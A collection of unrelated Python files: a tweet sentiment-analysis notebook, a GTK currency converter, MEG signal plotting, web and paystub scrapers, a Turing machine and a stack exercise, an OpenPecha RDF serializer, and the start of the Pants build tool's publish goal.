from textblob import TextBlob
df['sentiment_value']=df.tweet_txt.apply(lambda x:TextBlob(str((x).encode('ascii', 'ignore'))).sentiment.polarity)
# In[15]:
TextBlob(str(('bad people').encode('ascii', 'ignore'))).sentiment.polarity
# In[16]:
df['sentiment_score']=np.where(df.sentiment_value<=0.0,1,0)
# In[17]:
df['sentiment_description']=np.where(df.sentiment_value<=0.0,'negative','positive')
# In[18]:
df.head(30)
# In[19]:
print(df.sentiment_score.value_counts(),'\n\n',df.sentiment_description.value_counts())
# In[20]:
from wordcloud import WordCloud, STOPWORDS
stopwords = set(STOPWORDS)
def wordcloud(source,stop):
tmp = df[df['sentiment_description']==source]
clean_text=[]
for each in tmp['tweet_txt']:
clean_text.append(each)
clean_text = ' '.join(clean_text)
if source == 'positive' :
color='white'
else:
color='black'
if (stop=="yes"):
wordcloud = WordCloud(background_color=color,
width=3500,
height=3000,stopwords = stopwords
).generate(clean_text)
else:
wordcloud = WordCloud(background_color=color,
width=3500,
height=3000
).generate(clean_text)
print('==='*30)
print('word cloud of '+source+' is plotted below')
plt.figure(1,figsize=(8,8))
plt.imshow(wordcloud,interpolation='bilinear')
plt.axis('off')
plt.show()
# In[21]:
stopwords.add('co')
stopwords.add('https')
stopwords.add('hey')
stopwords.add('hello')
stopwords.add('school')
# In[22]:
wordcloud('positive',"yes")
# In[23]:
wordcloud('negative',"yes")
# In[24]:
from sklearn.model_selection import train_test_split
train, test = train_test_split(df,test_size=0.3)
# In[25]:
df.head()
# In[26]:
train_corpus = []
test_corpus = []
model_corpus=[]
for each in train['tweet_txt']:
train_corpus.append(each)
for each in test['tweet_txt']:
test_corpus.append(each)
for each in df['tweet_txt']:
model_corpus.append(each)
## Start creating them
from sklearn.feature_extraction.text import TfidfVectorizer
v = TfidfVectorizer(stop_words='english',strip_accents='unicode',
token_pattern=r'\w{2,}')
train_features = v.fit_transform(train_corpus)
test_features=v.transform(test_corpus)
model_features = v.transform(model_corpus)
# In[27]:
print(train_features.shape)
print(test_features.shape)
print(model_features.shape)
# In[28]:
v.get_feature_names()
# In[29]:
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
# In[30]:
Classifiers = {'lg':LogisticRegression(random_state=42,C=5,max_iter=200), 'dt':DecisionTreeClassifier(random_state=42,min_samples_leaf=1), 'rf':RandomForestClassifier(random_state=42,n_estimators=100,n_jobs=-1), 'gb':GradientBoostingClassifier(random_state=42,n_estimators=100,learning_rate=0.3)}
# In[31]:
def ML_Pipeline(clf_name):
clf = Classifiers[clf_name]
fit = clf.fit(train_features,train['sentiment_description'])
pred = clf.predict(test_features)
Accuracy = accuracy_score(test['sentiment_description'],pred)
Confusion_matrix = confusion_matrix(test['sentiment_description'],pred)
print('==='*35)
print('Accuracy of '+ clf_name +' is '+str(Accuracy))
print('==='*35)
print(Confusion_matrix)
# In[32]:
ML_Pipeline('lg')
# In[33]:
df['textblob_score']=np.where(df.sentiment_value<=1,0,0.0)
# In[34]:
df.head()
# In[35]:
df['tbsentiment_description']=np.where(df.textblob_score<=0.0,'positive','negative')
# In[36]:
df.head()
# In[37]:
accuracy_score( df['tbsentiment_description'], df['sentiment_description'],)
# In[38]:
model = ML_Pipeline('lg')
df["model_description"]=model
# In[39]:
ML_Pipeline('dt')
# In[40]:
test_corpus
# In[41]:
train['sentiment_description']
# In[42]:
clf = RandomForestClassifier(random_state=42,n_estimators=100,n_jobs=-1)
fit = clf.fit(train_features,train['sentiment_description'])
# In[43]:
words = v.get_feature_names()
importance = clf.feature_importances_
impordf = pd.DataFrame({'Word' : words,'Importance' : importance})
impordf = impordf.sort_values(['Importance', 'Word'], ascending=[0, 1])
impordf.head(20)
# In[44]:
impordf.loc[impordf['Importance']<=0.0]
# In[45]:
clf = LogisticRegression(random_state=42,C=5,max_iter=200)
fit = clf.fit(train_features,train['sentiment_description'])
pred = clf.predict(test_features)
Accuracy = accuracy_score(test['sentiment_description'],pred)
Confusion_matrix = confusion_matrix(test['sentiment_description'],pred)
print('==='*35)
print('Accuracy of '+ 'lr' +' is '+str(Accuracy))
print('==='*35)
print(Confusion_matrix)
# In[46]:
get_ipython().system('pip install joblib')
# In[47]:
from joblib import dump,load
dump(fit,'lr.joblib')
dump(v,'tfid.joblib')
# In[48]:
from joblib import dump,load
model=load('lr.joblib')
tfidf_temp=load('tfid.joblib')
# In[49]:
a=["internet is very slow",
"issue with billing",
"nice service provided",
"thanks problem resolved"
,"HeyFriends I found great iPhone 6S giveaway you can get it here---> #iphone6Sgiveawy2k16 Check it out looks like great freebie. Don't Drop This"
,"Unfortunately I will have to transfer my lines to a different provider. I would like to ensure there won't be any issues when my new provider attempts to port my numbers to their service?"]
tdf=pd.Series(a).astype(str).apply(lambda x:data_cleansing(x))
t_a=tfidf_temp.transform(tdf)
pred1 = model.predict(t_a)
# In[50]:
pred1
# In[49]:
ML_Pipeline(tfid.joblib)
# In[ ]:
|
import libglade, gtk
from funciones import conversiones
class EuroConversor:
def __init__(self):
self.arbol = libglade.GladeXML( "uno.glade", "window1" )
self.caja1 = self.arbol.get_widget( "entry1" )
self.caja2 = self.arbol.get_widget( "entry2" )
manejadores = { "on_entry1_key_press_event" : self.pasar,
"on_entry2_key_press_event" : self.pasar,
# "on_entry1_changed" : self.pasar,
# "on_entry2_changed" : self.pasar,
}
self.arbol.signal_autoconnect( manejadores )
self.arbol.signal_connect( "on_window1_destroy", self.salir )
def a_correr(self):
gtk.mainloop()
def salir(self, obj):
print "Saliendo..."
gtk.mainquit()
def pasar(self, obj, ev):
""" En 'obj' viene el objeto que llama (la caja de texto),
En 'ev' viene el evento, dir(ev) = keyval, send_event, state, string, time, type, window
"""
nombre = libglade.get_widget_name( obj )
if nombre == "entry1":
entrada_validada1 = conversiones.validar_entrada1(obj.get_text() + ev.string)
if entrada_validada1:
self.caja2.set_text( conversiones.pelas_a_euros( entrada_validada1 ) )
else:
self.caja1.set_text( "" )
self.caja2.set_text( "" )
elif nombre == "entry2":
entrada_validada2 = conversiones.validar_entrada2(obj.get_text() + ev.string)
if entrada_validada2:
self.caja1.set_text( conversiones.euros_a_pelas( entrada_validada2 ) )
else:
self.caja1.set_text( "" )
self.caja2.set_text( "" )
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 26 15:03:48 2013
@author: bejar
"""
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 12:41:42 2013
@author: bejar
"""
import scipy.io
from numpy import mean, std
import matplotlib.pyplot as plt
from pylab import *
from numpy.fft import rfft, irfft
from matplotlib.backends.backend_pdf import PdfPages
regions={'sup':['A2','A3','A4','A5','A6','A7','A8','A9',
'A10','A11','A12','A13','A14','A15','A16',
'A17','A18','A19','A20','A21','A22','A23',
'A24','A25','A26','A27','A28','A29'],
'front': ['A30','A31','A32',
'A48','A49','A50','A51','A52',
'A69','A70','A71','A72','A73','A74',
'A92','A93','A94'],
'tempi': ['A33','A34','A35','A36','A37',
'A53','A54','A55','A56','A57',
'A75','A76','A77','A78','A79','A80',
'A95','A96','A97','A98','A99','A100',
'A113','A114','A115','A116','A117','A118',
'A131','A132','A133','A134','A135','A136'],
'tempd': ['A43','A44','A45','A46','A47',
'A64','A65','A66','A67','A68',
'A86','A87','A88','A89','A90','A91',
'A107','A108','A109','A110','A111','A112',
'A125','A126','A127','A128','A129','A130',
'A143','A144','A145','A146','A147','A148'],
'occip': ['A38','A39','A40','A41','A42',
'A58','A59','A60','A61','A62','A63'
'A81','A82','A83','A84','A85',
'A101','A102','A103','A104','A105','A106',
'A119','A120','A121','A122','A123','A124',
'A137','A138','A139','A140','A141','A142']
}
def plotSignals(signals,cpath,n,m):
fig = plt.figure()
fig.set_figwidth(16)
fig.set_figheight(30)
i=1
for s,snm in signals:
if min(s)!=max(s):
plotSignalValues(fig,s,n,m,i,snm)
else:
plotDummy(fig,len(s),n,m,i,snm)
i+=1
fig.savefig(pp, orientation='landscape',format='pdf')
# plt.show()
# Plot a set of signals
#def plotSignalValues(fig,signal1,n,m,p,name):
# minaxis=min(signal1)
# maxaxis=max(signal1)
# num=len(signal1)
# sp1=fig.add_subplot(n,m,p)
# plt.title(name)
# sp1.axis([0,num,minaxis,maxaxis])
# t = arange(0.0, num, 1)
# sp1.plot(t,signal1)
# plt.show()
def plotDummy(fig,num,n,m,p,name):
minaxis=-1
maxaxis=1
sp1=fig.add_subplot(n,m,p)
plt.title(name)
sp1.axis([0,num,minaxis,maxaxis])
t = arange(0.0, num, 1)
sp1.plot(t,t)
# plt.show()
# Plot a set of signals
#def plotSignalValues(signal):
# fig = plt.figure()
# minaxis=min(signal)
# maxaxis=max(signal)
# sp1=fig.add_subplot(111)
# sp1.axis([0,length,minaxis,maxaxis])
# t = arange(0.0, length, 1)
# sp1.plot(t,signal)
# plt.show()
def plotSignalValues(signal1,signal2,signal3):
fig = plt.figure()
minaxis=min(signal1)
maxaxis=max(signal1)
num=len(signal1)
sp1=fig.add_subplot(311)
sp1.axis([0,num,minaxis,maxaxis])
t = arange(0.0, num, 1)
sp1.plot(t,signal1)
sp1=fig.add_subplot(312)
minaxis=min(signal2)
maxaxis=max(signal2)
num=len(signal1)
sp1.axis([0,num,minaxis,maxaxis])
t = arange(0.0, num, 1)
sp1.plot(t,signal2)
sp1=fig.add_subplot(313)
minaxis=min(signal3)
maxaxis=max(signal3)
num=len(signal1)
sp1.axis([0,num,minaxis,maxaxis])
t = arange(0.0, num, 1)
sp1.plot(t,signal3)
plt.show()
def signalIndex(sig):
ind=0
for i in range(chann.shape[0]):
if chann[i][0][0]==sig:
ind=i
return ind
cpath='/home/bejar/MEG/Data/compensados/'
cres='/home/bejar/Documentos/Investigacion/MEG/res/'
#name='MMN-201205251030'
name='comp1-MEG'
mats=scipy.io.loadmat( cpath+name+'.mat')
chann=mats['names']
data= mats['data'][signalIndex('A120')]
freqi1=0
freqf1=6
freqi2=8
freqf2=18
length=2048#678*2
# 30-60 = 181-363 (2048)
# 60-100=363-606
zeroed=[(0,363),(606,1024)]
off=8000
print signalIndex('A120')
ibeat=280
ilength=40
ifreq=525
hbeat=data[off:length+off].copy()
#for i in range(ibeat,len(hbeat),ifreq):
# hbeat[i:i+ilength]=hbeat[i]
# print i
orig=hbeat
temp= rfft(orig)
for i,f in zeroed:
temp[i:f]=0
vals= irfft(temp)
plotSignalValues(vals,hbeat,data[off:length+off])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from head import *
from django_frame_solution import DjangoFrameSolution
class DjangoFrameMain():
"""
此类负责处理每个连接实例,包括收发包,解析等操作
"""
def __init__(self, client):
self.client = client
self.fileno = client.fileno()
def main_receivor(self, ):
"""
连接实例主处理入口,收取数据
:rtype: 如果接受数据不为空, 返回 1, 如果查过判断僵死时间,返回 -1, 否则返回 0
"""
servant = DjangoFrameSolution()
version, body = servant.receive(self.client)
if body != '':
# 解析数据
json_inst = servant.parse(body)
return json_inst
|
import charts
import scrap
base_url = 'http://cva-web.dataproject.com'
if __name__ == '__main__':
# 爬取数据
print('开始爬取2018年,女排比赛数据...')
# scrap.data_scrap(base_url + '/CompetitionHome.aspx?ID=4',2018)
print('开始爬取2019年,女排比赛数据...')
# scrap.data_scrap(base_url + '/CompetitionHome.aspx?ID=37',2019)
# 分析数据
print('开始执行数据数据可视化...')
charts.data_analysis()
# 'http://cva-web.dataproject.com/CompetitionHome.aspx?ID=4' |
import csv, glob, os, time, datetime
from bs4 import BeautifulSoup
# Directory of html files
input_dir = "src/html_hourly/"
generated = time.strftime("%I:%M:%S, %d/%m/%Y")
timestamp = datetime.datetime.now()
# Create the CSV and header row
f = csv.writer(open("src/paycheck_hourly_%s.csv" % timestamp, "w"))
f.writerow(["Date", "Total Pay", "Net Pay", "Total Taxes", "Federal Taxes", "Social Security", "Medicare", "State Tax", "City Tax", "Deductions", "Hours", "Rate", "Generated"])
# Write to CSV
for file_name in glob.glob(input_dir+ "*.html"):
# Open the HTML files
with open(file_name) as fp:
record = BeautifulSoup(fp, "html.parser")
# Get paystub dates
date = record.find(id="paystub_form_tbl").td.get_text(strip=True).strip("Pay stub for period:").lstrip()
# Get the relevant sections
summary_table = record.find(id="paystub_summary_tbl").find_all('div')
pay_table = record.find(id="paystub_pay_tbl").find_all('div')
net_table = record.find(id="paystub_net_tbl").find_all('td')
tax_table = record.find(id="paystub_ee_taxes_tbl").find_all('td')
# Create lists
summaries = []
pay_rows = []
net_rows = []
tax_rows = []
# Clean data
for item in summary_table:
item = item.get_text("", strip=True).encode('utf-8')
summaries.append(item)
for item in pay_table:
item = item.get_text(",", strip=True).encode('utf-8')
pay_rows.append(item)
for item in net_table:
item = item.get_text(",", strip=True).encode('utf-8')
net_rows.append(item)
for item in tax_table:
item = item.get_text(",", strip=True).encode('utf-8')
tax_rows.append(item)
# Create items from cleaned arrays
total = summaries[0]
deductions = summaries[2]
taxes = summaries[4]
hours = pay_rows[4]
rate = pay_rows[5]
net = net_rows[1]
taxes_total = summaries[4]
federal_taxes = tax_rows[1]
social_security = tax_rows[4]
medicare = tax_rows[7]
state_tax = tax_rows[10]
city_tax = tax_rows[13]
f.writerow([date, total, net, taxes_total, federal_taxes, social_security, medicare, state_tax, city_tax, deductions, hours, rate, generated])
print date, total, net, taxes_total, federal_taxes, social_security, medicare, state_tax, city_tax, deductions, hours, rate, generated
|
#Pythagorean Sequence in Python
# Copyright © 2019, Sai K Raja, All Rights Reserved
def Pythagorean_Theorem(a, b):
if a > 0 and b > 0:
return a**2 + b**2
elif a < 0 or b < 0:
print("Cannot use negative values in Pythagorean Theorem")
for i in range (1):
print(Pythagorean_Theorem(3, 6))
|
"""
Name: Rafael Lopes Broseghini
Purpose: Create Turing machine that reverses a string of only 'r','e','v',s' characters.
"""
import unittest
class TuringMachine:
def __init__(self, startState=0, delta={}, finalStates=set()):
self.startState = startState
self.delta = delta
self.finalStates = finalStates
def run_machine(self, inputString: str) -> str:
tape = Tape(inputString)
theState = self.startState
startRead = tape.read()
key = (theState, startRead)
reached_final = False
transition_num = 0
while key in self.delta and not reached_final:
# Keeping track of how many transitions.
transition_num += 1
# Storing what state it goes to, what to write on the tape, what direction to move.
goTo, writeToTape, moveDirection = self.delta[key]
# print('Transition num:', transition_num,'Read:',tape.read(),'Going to state:',goTo,'Writing:',writeToTape,'Read at position:',tape.tapeReadPos, 'Moving to the:',moveDirection)
# print()
# Writing to the tape.
tape.write(writeToTape)
if moveDirection == "R":
tape.move_right()
# Set new key to state it went to and the input symbol after having moved right.
key = (goTo, tape.read())
elif moveDirection == "L":
tape.move_left()
# Set new key to state it went to and the input symbol after having moved left.
key = (goTo, tape.read())
else:
tape.not_move()
# Set new key to state it went to and the input symbol after having not moved left.
key = (goTo, tape.read())
# If reached final state.
if goTo in self.finalStates:
# have to fix this because I want to just return the tape and not
# mess with the tape object from the turing machine object.
tape = "".join(tape.contents).strip()
return "|{}|".format("|".join(list(tape)))
class Tape:
def __init__(self, inputRead=""):
self.contents = (
[" " for item in range(50)] + list(inputRead) + [" " for item in range(50)]
)
self.tapeReadPos = 50
def read(self) -> str:
return self.contents[self.tapeReadPos]
def write(self, ch: str) -> str:
self.contents[self.tapeReadPos] = ch
def move_right(self) -> None:
self.tapeReadPos += 1
if self.tapeReadPos == len(self.contents):
for item in range(len(self.contents)):
self.contents.append(" ")
def move_left(self) -> None:
self.tapeReadPos -= 1
if self.tapeReadPos == -1:
self.contents = [" " for item in range(len(self.contents))] + self.contents
self.tapeReadPos = len(self.contents) // 2 - 1
# Not move. Only accessed when reaches a final state.
def not_move(self) -> None:
self.tapeReadPos = self.tapeReadPos
def __str__(self) -> str:
tape = "".join(self.contents).strip()
return "|{}|".format("|".join(list(tape)))
class TestTuringMachine(unittest.TestCase):
def test(self):
delta = {
(0, "$"): (1, "$", "R"),
(1, "x"): (1, "x", "R"),
(1, "r"): (2, "x", "L"),
(1, "e"): (5, "x", "L"),
(1, "v"): (4, "x", "L"),
(1, "s"): (3, "x", "L"),
(1, "$"): (10, " ", "L"),
(2, "$"): (2, "$", "L"),
(2, "x"): (2, "x", "L"),
(2, "r"): (2, "r", "L"),
(2, "e"): (2, "e", "L"),
(2, "v"): (2, "v", "L"),
(2, "s"): (2, "s", "L"),
(2, "e"): (2, "e", "L"),
(2, " "): (6, "r", "R"),
(3, "$"): (3, "$", "L"),
(3, "r"): (3, "r", "L"),
(3, "e"): (3, "e", "L"),
(3, "v"): (3, "v", "L"),
(3, "s"): (3, "s", "L"),
(3, "x"): (3, "x", "L"),
(3, " "): (7, "s", "R"),
(4, "$"): (4, "$", "L"),
(4, "r"): (4, "r", "L"),
(4, "e"): (4, "e", "L"),
(4, "v"): (4, "v", "L"),
(4, "s"): (4, "s", "L"),
(4, "x"): (4, "x", "L"),
(4, " "): (8, "v", "R"),
(5, "$"): (5, "$", "L"),
(5, "r"): (5, "r", "L"),
(5, "e"): (5, "e", "L"),
(5, "v"): (5, "v", "L"),
(5, "s"): (5, "s", "L"),
(5, "x"): (5, "x", "L"),
(5, " "): (9, "e", "R"),
(6, "r"): (6, "r", "R"),
(6, "e"): (6, "e", "R"),
(6, "s"): (6, "s", "R"),
(6, "v"): (6, "v", "R"),
(6, "$"): (1, "$", "R"),
(7, "r"): (7, "r", "R"),
(7, "e"): (7, "e", "R"),
(7, "s"): (7, "s", "R"),
(7, "v"): (7, "v", "R"),
(7, "$"): (1, "$", "R"),
(8, "r"): (8, "r", "R"),
(8, "e"): (8, "e", "R"),
(8, "s"): (7, "s", "R"),
(8, "v"): (8, "v", "R"),
(8, "$"): (1, "$", "R"),
(9, "r"): (9, "r", "R"),
(9, "e"): (9, "e", "R"),
(9, "s"): (9, "s", "R"),
(9, "v"): (9, "v", "R"),
(9, "$"): (1, "$", "R"),
(10, "$"): (11, "$", "L"),
(10, "x"): (10, " ", "L"),
(11, "r"): (11, "r", "L"),
(11, "e"): (11, "e", "L"),
(11, "s"): (11, "s", "L"),
(11, "v"): (11, "v", "L"),
(11, " "): (12, "$", "N"),
}
# Set final state.
finalStates = set([12])
tm = TuringMachine(0, delta, finalStates)
tape = Tape()
self.assertEqual(tm.run_machine("$reverse$"), "|$|e|s|r|e|v|e|r|$|")
if __name__ == "__main__":
unittest.main()
# main()
|
# Stack implementation using a linked list
class Node:
def __init__(self, data=None):
self.data = data
self.next = None
class Stack:
def __init__(self):
self.top = None
self.bottom = None
self.length = 0
def peek(self):
return self.top
def push(self, value):
toAdd = Node(value)
if self.length == 0:
self.top = toAdd
self.bottom = toAdd
else:
toAdd.next = self.top
self.top = toAdd
self.length += 1
return self
def pop(self):
if self.length == 0:
return self
if self.top == self.bottom:
self.bottom = None
#look into garbage collection for python
self.top = self.top.next
self.length -= 1
return self
#Testing
myStack = Stack()
myStack.push('Hello')
myStack.push('Hello1')
myStack.push('Hello2')
myStack.push('Hello3')
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
|
import re
from pathlib import Path
from openpecha.serializers.rdf_setup import *
from openpecha.buda.op_fs import OpenpechaFS
from openpecha.buda.op_bare import OpenpechaBare
from openpecha.buda.tibetan_easy_chunker import TibetanEasyChunker
class Rdf:
"""
TODO:
- rename in RDFSerializer
- initialize with an OpenPecha instead of a path
"""
def __init__(self, lname, path=str(Path.home()/'.openpecha/data'), from_git=True):
self.graphname = lname
self.lod_ds = rdflib.Dataset()
self.lod_g = self.lod_ds.graph(bdg[self.graphname])
self.lod_g.namespace_manager = nsm
self.openpecha = self.create_openpecha(lname, path, from_git)
self.setup_openpecha()
def graph(self):
return self.lod_g
def add_triplet(self, rdf_subject, rdf_predicate, rdf_object):
self.lod_g.add((rdf_subject, rdf_predicate, rdf_object))
@staticmethod
def create_openpecha(lname, path, git):
if git:
return OpenpechaBare(lname, path)
else:
return OpenpechaFS(lname, path)
"""
Setting up the openpecha, getting all the base_layers and extra layers
"""
def setup_openpecha(self):
self.get_op_base_layers()
self.get_op_layers()
self.get_op_meta()
def get_op_base_layers(self):
self.openpecha.get_base()
def get_op_layers(self):
self.openpecha.get_layers()
def get_op_meta(self):
self.openpecha.get_meta()
"""
Building the RDF graph
"""
def set_instance(self):
self.add_triplet(bdr[f'IE0{self.graphname}'], rdf.type, bdo["EtextInstance"])
if self.openpecha.meta.get('source_metadata'):
self.parse_meta()
self.get_base_volumes()
self.set_adm()
def parse_meta(self):
sour = self.openpecha.meta['source_metadata']['id'].split(":")
self.add_triplet(bdr[f'IE0{self.graphname}'], bdo['instanceReproductionOf'], globals()[sour[0]][sour[-1]])
def get_base_volumes(self):
for volume in self.openpecha.base_layer.items():
self.set_etext_asset(volume)
self.add_triplet(bdr[f'IE0{self.graphname}'], bdo['instanceHasVolume'],
bdr[f'VLIE0{self.graphname}_{volume[0].replace(".txt", "")}'])
self.set_etext_ref(volume)
self.set_etext(volume)
def set_etext_asset(self, volume):
volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
volume_number = int(re.search(r'\d+', volume[0].replace(".txt", "")).group())
subject = bdr[f'VL{volume_name}']
self.add_triplet(subject, rdf.type, bdo['VolumeEtextAsset'])
self.add_triplet(subject, bdo['volumeHasEtext'], bdr[f'ER{volume_name}'])
self.add_triplet(subject, bdo['volumeNumber'], Literal(volume_number, datatype=XSD.integer))
self.add_triplet(subject, bdo['volumeOf'], bdr[f'IE0{self.graphname}'])
def set_etext_ref(self, volume):
volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
subject = bdr[f'ER{volume_name}']
self.add_triplet(subject, rdf.type, bdo['EtextRef'])
self.add_triplet(subject, bdo['eTextResource'], bdr[f'UT{volume_name}'])
self.add_triplet(subject, bdo['seqNum'], Literal(1, datatype=XSD.integer))
def set_etext(self, volume):
volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
volume_number = int(re.search(r'\d+', volume[0].replace(".txt", "")).group())
subject = bdr[f'UT{volume_name}']
self.add_triplet(subject, rdf.type, bdo['Etext'])
self.add_triplet(subject, bdo['eTextInInstance'], bdr[volume_name])
self.add_triplet(subject, bdo['eTextIsVolume'], Literal(volume_number, datatype=XSD.integer))
self.add_triplet(subject, rdfs.seeAlso, Literal(f'https://github.com/OpenPecha/{self.graphname}/', datatype=XSD.anyURI))
self.set_etext_pages(volume)
self.set_etext_chunks(volume)
def set_etext_pages(self, volume):
volume_number = volume[0].replace(".txt", "")
annotations = self.openpecha.layers[volume_number]['pagination.yml'].annotations
for annotation in annotations:
self.set_etext_page(annotation, volume)
def set_etext_page(self, annotation, volume):
volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
subject = bdr[f'EP{annotation["id"]}']
sequence = self.get_sequence(annotation['page_index'])
start = annotation['span']['start']
end = annotation['span']['end']
self.add_triplet(subject, rdf.type, bdo['EtextPage'])
self.add_triplet(subject, bdo['seqNum'], Literal(sequence, datatype=XSD.integer))
self.add_triplet(subject, bdo['sliceEndChar'], Literal(end, datatype=XSD.integer))
self.add_triplet(subject, bdo['sliceStartChar'], Literal(start, datatype=XSD.integer))
self.add_triplet(bdr[f'UT{volume_name}'], bdo['eTextHasPage'], subject)
@staticmethod
def get_sequence(page_index):
number = int(re.search(r'\d+', page_index).group())
return number * 2 if page_index[-1] == 'b' else (number * 2) - 1
def set_etext_chunks(self, volume):
volume_string = self.openpecha.base_layer[volume[0]]
chunk_indexes = self.get_chunk_index(volume_string)
for i in range(0, len(chunk_indexes) - 2):
self.set_etext_chunk(i, chunk_indexes[i], chunk_indexes[i + 1], volume)
def set_etext_chunk(self, i, start_char, end_char, volume):
volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
volume_string = self.openpecha.base_layer[volume[0]]
etext = f'UT{volume_name}'
subject = bdr[f'UT{volume_name}_{int(i):05}']
self.add_triplet(subject, rdf.type, bdo['EtextChunk'])
self.add_triplet(subject, bdo['chunkContents'], Literal(volume_string[start_char:end_char], lang="bo"))
self.add_triplet(subject, bdo['sliceEndChar'], Literal(end_char, datatype=XSD.integer))
self.add_triplet(subject, bdo['sliceStartChar'], Literal(start_char, datatype=XSD.integer))
self.add_triplet(bdr[etext], bdo['eTextHasChunk'], subject)
def set_adm(self):
subject = bda[f'IE0{self.graphname}']
commit = self.openpecha.get_last_commit()
self.add_triplet(subject, rdf.type, adm['AdminData'])
self.add_triplet(subject, adm['adminAbout'], subject)
self.add_triplet(subject, adm['metadataLegal'], bda['LD_BDRC_CC0'])
self.add_triplet(subject, adm['openPechaCommit'], Literal(commit))
self.add_triplet(subject, adm['status'], bda['StatusReleased'])
@staticmethod
def get_chunk_index(string):
chunker = TibetanEasyChunker(string, 1500)
indexes = chunker.get_chunks()
return indexes
"""
Getting details of the rdf
"""
def print_rdf(self):
print(self.lod_g.serialize(format='ttl').decode("utf-8"))
def rdf(self):
return self.lod_g
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Goal for publishing packaged targets to any repository or registry etc.
Plugins implement the publish protocol that provides this goal with the processes to run in order to
publish the artifacts.
The publish protocol consists of defining two union members and one rule, returning the processes to
run. See the doc for the corresponding classses in this module for details on the classes to define.
Example rule:
@rule
async def publish_example(request: PublishToMyRepoRequest, ...) -> PublishProcesses:
# Create `InteractiveProcess` instances as required by the `request`.
return PublishProcesses(...)
"""
from __future__ import annotations
import collections
import json
import logging
from abc import ABCMeta
from dataclasses import asdict, dataclass, field, is_dataclass, replace
from itertools import chain
from typing import ClassVar, Generic, Type, TypeVar
from typing_extensions import final
from pants.core.goals.package import BuiltPackage, EnvironmentAwarePackageRequest, PackageFieldSet
from pants.engine.addresses import Address
from pants.engine.collection import Collection
from pants.engine.console import Console
from pants.engine.environment import ChosenLocalEnvironmentName, EnvironmentName
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.process import InteractiveProcess, InteractiveProcessResult
from pants.engine.rules import Effect, Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
ImmutableValue,
NoApplicableTargetsBehavior,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.option_types import StrOption
from pants.util.frozendict import FrozenDict
logger = logging.getLogger(__name__)
_F = TypeVar("_F", bound=FieldSet)
class PublishOutputData(FrozenDict[str, ImmutableValue]):
pass
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class PublishRequest(Generic[_F]):
"""Implement a union member subclass of this union class along with a PublishFieldSet subclass
that appoints that member subclass in order to receive publish requests for targets compatible
with the field set.
The `packages` hold all artifacts produced for a given target to be published.
Example:
PublishToMyRepoRequest(PublishRequest):
pass
PublishToMyRepoFieldSet(PublishFieldSet):
publish_request_type = PublishToMyRepoRequest
# Standard FieldSet semantics from here on:
required_fields = (MyRepositories,)
...
"""
field_set: _F
packages: tuple[BuiltPackage, ...]
_T = TypeVar("_T", bound=PublishRequest)
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class PublishFieldSet(Generic[_T], FieldSet, metaclass=ABCMeta):
"""FieldSet for PublishRequest.
Union members may list any fields required to fulfill the instantiation of the
`PublishProcesses` result of the publish rule.
"""
# Subclasses must provide this, to a union member (subclass) of `PublishRequest`.
publish_request_type: ClassVar[Type[_T]] # type: ignore[misc]
@final
def _request(self, packages: tuple[BuiltPackage, ...]) -> _T:
"""Internal helper for the core publish goal."""
return self.publish_request_type(field_set=self, packages=packages)
@final
@classmethod
def rules(cls) -> tuple[UnionRule, ...]:
"""Helper method for registering the union members."""
return (
UnionRule(PublishFieldSet, cls),
UnionRule(PublishRequest, cls.publish_request_type),
)
def get_output_data(self) -> PublishOutputData:
return PublishOutputData({"target": self.address})
@dataclass(frozen=True)
class PublishPackages:
"""Processes to run in order to publish the named artifacts.
The `names` should list all artifacts being published by the `process` command.
The `process` may be `None`, indicating that it will not be published. This will be logged as
`skipped`. If the process returns a non zero exit code, it will be logged as `failed`.
The `description` may be a reason explaining why the publish was skipped, or identifying which
repository the artifacts are published to.
"""
names: tuple[str, ...]
process: InteractiveProcess | None = None
description: str | None = None
data: PublishOutputData = field(default_factory=PublishOutputData)
def get_output_data(self, **extra_data) -> PublishOutputData:
return PublishOutputData(
{
"names": self.names,
**self.data,
**extra_data,
}
)
class PublishProcesses(Collection[PublishPackages]):
"""Collection of what processes to run for all built packages.
This is returned from implementing rules in response to a PublishRequest.
Depending on the capabilities of the publishing tool, the work may be partitioned based on
number of artifacts and/or repositories to publish to.
"""
@dataclass(frozen=True)
class PublishProcessesRequest:
"""Internal request taking all field sets for a target and turning it into a `PublishProcesses`
collection (via registered publish plugins)."""
package_field_sets: tuple[PackageFieldSet, ...]
publish_field_sets: tuple[PublishFieldSet, ...]
class PublishSubsystem(GoalSubsystem):
name = "publish"
help = "Publish deliverables (assets, distributions, images, etc)."
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return PackageFieldSet in union_membership and PublishFieldSet in union_membership
output = StrOption(
default=None,
help="Filename for JSON structured publish information.",
)
class Publish(Goal):
subsystem_cls = PublishSubsystem
environment_behavior = Goal.EnvironmentBehavior.USES_ENVIRONMENTS
@goal_rule
async def run_publish(
console: Console, publish: PublishSubsystem, local_environment: ChosenLocalEnvironmentName
) -> Publish:
target_roots_to_package_field_sets, target_roots_to_publish_field_sets = await MultiGet(
Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
PackageFieldSet,
goal_description="",
# Don't warn/error here because it's already covered by `PublishFieldSet`.
no_applicable_targets_behavior=NoApplicableTargetsBehavior.ignore,
),
),
